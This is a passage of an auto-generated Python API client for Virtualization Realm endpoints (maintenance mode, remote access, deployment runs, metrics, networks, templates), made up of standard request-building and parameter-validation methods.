>>> thread = api.enable_maintence_mode1(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param bool enable: Enable or disable maintenance mode
:param MaintenanceModeRequest maintenance_mode_request: The maintenance mode request, when enabling maintenance mode
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.enable_maintence_mode1_with_http_info(id, **kwargs) # noqa: E501
def enable_maintence_mode1_with_http_info(self, id, **kwargs): # noqa: E501
"""Update Maintenance Mode # noqa: E501
Updates the maintenance status for a single Virtualization Realm by the given ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.enable_maintence_mode1_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param bool enable: Enable or disable maintenance mode
:param MaintenanceModeRequest maintenance_mode_request: The maintenance mode request, when enabling maintenance mode
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'enable', 'maintenance_mode_request'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method enable_maintence_mode1" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `enable_maintence_mode1`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'enable' in local_var_params and local_var_params['enable'] is not None: # noqa: E501
query_params.append(('enable', local_var_params['enable'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'maintenance_mode_request' in local_var_params:
body_params = local_var_params['maintenance_mode_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/xml']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/virtualizationrealms/{id}/maintenance', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='bool', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def enable_virt_realm_remote_access(self, id, **kwargs): # noqa: E501
"""Enable Remote Access # noqa: E501
Enables Remote Access for a single Virtualization Realm by the given ID.<br> <br> To do so, Remote Access must be configured for the Virtualization Realm.<br> <br> If no instanceType is provided, the Instance Type will first attempt to use the value from the Virtualization Realm's Remote Access config. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.enable_virt_realm_remote_access(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param str instance_type: Remote access server instance type
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.enable_virt_realm_remote_access_with_http_info(id, **kwargs) # noqa: E501
def enable_virt_realm_remote_access_with_http_info(self, id, **kwargs): # noqa: E501
"""Enable Remote Access # noqa: E501
Enables Remote Access for a single Virtualization Realm by the given ID.<br> <br> To do so, Remote Access must be configured for the Virtualization Realm.<br> <br> If no instanceType is provided, the Instance Type will first attempt to use the value from the Virtualization Realm's Remote Access config. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.enable_virt_realm_remote_access_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param str instance_type: Remote access server instance type
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'instance_type'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method enable_virt_realm_remote_access" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `enable_virt_realm_remote_access`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'instance_type' in local_var_params and local_var_params['instance_type'] is not None: # noqa: E501
query_params.append(('instanceType', local_var_params['instance_type'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/virtualizationrealms/{id}/remoteaccess', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='bool', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_deployment_runs_in_virtualization_realm(self, id, search_type, **kwargs): # noqa: E501
"""List Deployment Runs # noqa: E501
Returns a collection of the Deployment Runs launched into the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_deployment_runs_in_virtualization_realm(id, search_type, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param str search_type: Deployment run status type (required)
:param int maxresults: Maximum number of results to return
:param int page: Requested page number
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: list[MinimalDeploymentRun]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_deployment_runs_in_virtualization_realm_with_http_info(id, search_type, **kwargs) # noqa: E501
def get_deployment_runs_in_virtualization_realm_with_http_info(self, id, search_type, **kwargs): # noqa: E501
"""List Deployment Runs # noqa: E501
Returns a collection of the Deployment Runs launched into the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_deployment_runs_in_virtualization_realm_with_http_info(id, search_type, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param str search_type: Deployment run status type (required)
:param int maxresults: Maximum number of results to return
:param int page: Requested page number
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(list[MinimalDeploymentRun], status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'search_type', 'maxresults', 'page'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_deployment_runs_in_virtualization_realm" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_deployment_runs_in_virtualization_realm`") # noqa: E501
# verify the required parameter 'search_type' is set
if self.api_client.client_side_validation and ('search_type' not in local_var_params or # noqa: E501
local_var_params['search_type'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `search_type` when calling `get_deployment_runs_in_virtualization_realm`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'search_type' in local_var_params and local_var_params['search_type'] is not None: # noqa: E501
query_params.append(('search_type', local_var_params['search_type'])) # noqa: E501
if 'maxresults' in local_var_params and local_var_params['maxresults'] is not None: # noqa: E501
query_params.append(('maxresults', local_var_params['maxresults'])) # noqa: E501
if 'page' in local_var_params and local_var_params['page'] is not None: # noqa: E501
query_params.append(('page', local_var_params['page'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/virtualizationrealms/{id}/deploymentruns', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[MinimalDeploymentRun]', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_host_configuration_metrics1(self, id, start, end, **kwargs): # noqa: E501
"""Retrieve Metrics # noqa: E501
Returns metric data for Deployment Runs launched into the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_host_configuration_metrics1(id, start, end, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param int start: Interval start time, specified in seconds since epoch (required)
:param int end: Interval end time, specified in seconds since epoch (required)
:param int interval: Number of intervals
:param str interval_unit: Interval unit
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_host_configuration_metrics1_with_http_info(id, start, end, **kwargs) # noqa: E501
def get_host_configuration_metrics1_with_http_info(self, id, start, end, **kwargs): # noqa: E501
"""Retrieve Metrics # noqa: E501
Returns metric data for Deployment Runs launched into the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_host_configuration_metrics1_with_http_info(id, start, end, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param int start: Interval start time, specified in seconds since epoch (required)
:param int end: Interval end time, specified in seconds since epoch (required)
:param int interval: Number of intervals
:param str interval_unit: Interval unit
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(str, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'start', 'end', 'interval', 'interval_unit'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_host_configuration_metrics1" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_host_configuration_metrics1`") # noqa: E501
# verify the required parameter 'start' is set
if self.api_client.client_side_validation and ('start' not in local_var_params or # noqa: E501
local_var_params['start'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `start` when calling `get_host_configuration_metrics1`") # noqa: E501
# verify the required parameter 'end' is set
if self.api_client.client_side_validation and ('end' not in local_var_params or # noqa: E501
local_var_params['end'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `end` when calling `get_host_configuration_metrics1`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'start' in local_var_params and local_var_params['start'] is not None: # noqa: E501
query_params.append(('start', local_var_params['start'])) # noqa: E501
if 'end' in local_var_params and local_var_params['end'] is not None: # noqa: E501
query_params.append(('end', local_var_params['end'])) # noqa: E501
if 'interval' in local_var_params and local_var_params['interval'] is not None: # noqa: E501
query_params.append(('interval', local_var_params['interval'])) # noqa: E501
if 'interval_unit' in local_var_params and local_var_params['interval_unit'] is not None: # noqa: E501
query_params.append(('intervalUnit', local_var_params['interval_unit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/virtualizationrealms/{id}/metrics/hostconfiguration', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_network(self, id, network_id, **kwargs): # noqa: E501
"""Retrieve Network # noqa: E501
Returns a single Network in the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_network(id, network_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param int network_id: ID of network (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Network
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_network_with_http_info(id, network_id, **kwargs) # noqa: E501
def get_network_with_http_info(self, id, network_id, **kwargs): # noqa: E501
"""Retrieve Network # noqa: E501
Returns a single Network in the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_network_with_http_info(id, network_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param int network_id: ID of network (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(Network, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'network_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_network" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_network`") # noqa: E501
# verify the required parameter 'network_id' is set
if self.api_client.client_side_validation and ('network_id' not in local_var_params or # noqa: E501
local_var_params['network_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `network_id` when calling `get_network`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'network_id' in local_var_params:
path_params['networkId'] = local_var_params['network_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/virtualizationrealms/{id}/networks/{networkId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Network', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_networks(self, id, **kwargs): # noqa: E501
"""List Networks # noqa: E501
Returns a collection of the Networks in the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_networks(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: list[MinimalNetwork]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_networks_with_http_info(id, **kwargs) # noqa: E501
def get_networks_with_http_info(self, id, **kwargs): # noqa: E501
"""List Networks # noqa: E501
Returns a collection of the Networks in the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_networks_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(list[MinimalNetwork], status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_networks" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_networks`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/virtualizationrealms/{id}/networks', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[MinimalNetwork]', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_template_subscription(self, id, subscription_id, **kwargs): # noqa: E501
"""Retrieve Template Subscription # noqa: E501
Returns a single Template Subscription in the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_template_subscription(id, subscription_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: ID of virtualization realm (required)
:param int subscription_id: ID of template subscription (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: FullTemplateSubscription
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_template_subscription_with_http_info(id, subscription_id, **kwargs) # noqa: E501
def get_template_subscription_with_http_info(self, id, subscription_id, **kwargs): # noqa: E501
"""Retrieve Template Subscription # noqa: E501
Returns a single Template Subscription in the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_template_subscription_with_http_info(id, subscription_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: ID of virtualization realm (required)
:param int subscription_id: ID of template subscription (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(FullTemplateSubscription, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'subscription_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_template_subscription" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_template_subscription`") # noqa: E501
# verify the required parameter 'subscription_id' is set
if self.api_client.client_side_validation and ('subscription_id' not in local_var_params or # noqa: E501
local_var_params['subscription_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `subscription_id` when calling `get_template_subscription`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'subscription_id' in local_var_params:
path_params['subscription_id'] = local_var_params['subscription_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/virtualizationrealms/{id}/templates/subscriptions/{subscription_id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='FullTemplateSubscription', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_templates_in_virtualization_realm(self, id, **kwargs): # noqa: E501
"""List Templates # noqa: E501
Returns a collection of the Templates in the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_templates_in_virtualization_realm(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: ID of virtualization realm (required)
:param bool include_registrations: Include templates registered to the virtualization realm
:param bool include_subscriptions: Include templates subscribed to by the virtualization realm
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: list[MinimalCons3rtTemplateData]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_templates_in_virtualization_realm_with_http_info(id, **kwargs) # noqa: E501
def get_templates_in_virtualization_realm_with_http_info(self, id, **kwargs): # noqa: E501
"""List Templates # noqa: E501
Returns a collection of the Templates in the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_templates_in_virtualization_realm_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: ID of virtualization realm (required)
:param bool include_registrations: Include templates registered to the virtualization realm
:param bool include_subscriptions: Include templates subscribed to by the virtualization realm
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(list[MinimalCons3rtTemplateData], status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'include_registrations', 'include_subscriptions'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_templates_in_virtualization_realm" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_templates_in_virtualization_realm`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'include_registrations' in local_var_params and local_var_params['include_registrations'] is not None: # noqa: E501
query_params.append(('include_registrations', local_var_params['include_registrations'])) # noqa: E501
if 'include_subscriptions' in local_var_params and local_var_params['include_subscriptions'] is not None: # noqa: E501
query_params.append(('include_subscriptions', local_var_params['include_subscriptions'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/virtualizationrealms/{id}/templates', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[MinimalCons3rtTemplateData]', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_unregistered_networks(self, id, **kwargs): # noqa: E501
"""List Unregistered Networks # noqa: E501
Returns a collection of the unregistered, back-end Networks in the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_unregistered_networks(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: list[Subnet]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_unregistered_networks_with_http_info(id, **kwargs) # noqa: E501
def get_unregistered_networks_with_http_info(self, id, **kwargs): # noqa: E501
"""List Unregistered Networks # noqa: E501
Returns a collection of the unregistered, back-end Networks in the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_unregistered_networks_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param _return_http_data_only: response data without head status code
and headers
